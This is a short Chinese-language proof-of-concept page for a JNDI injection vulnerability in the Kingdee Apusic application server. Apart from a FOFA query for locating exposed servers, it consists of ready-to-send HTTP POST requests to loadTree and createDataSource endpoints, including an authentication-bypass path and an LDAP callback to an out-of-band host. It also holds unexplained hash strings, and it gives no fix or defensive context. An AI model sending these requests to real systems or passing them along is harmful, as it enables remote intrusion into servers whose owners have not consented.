跳到主要内容

金蝶Apusic应用服务器loadTreeJNDI注入漏洞

金蝶Apusic应用服务器loadTree JNDI注入漏洞

fofa

app="Apusic应用服务器"

poc

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址



POST /admin/;//protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址



POST /admin/;//protect/datasource/createDataSource HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 260
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded

name=nobg7&jndiName=ldap://cm38sdn1l3f79d1jb0jgoahe856jrdjkg.oast.site/ahsdhashduqwe&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=nobg7&userName=nobg7&password=nobg7&repassword=nobg7&connectionURL=sdasd&driverClassName=java.lang.String&testCommand=

a519acd405e2e60c00108378f8410c8d

1dc3f827f335c01618f9dd9c4b39832b

584c726b09f954433d5c3248ac5c1368

02678af9ca19b8ee1104c874943e5f94

##漏洞来源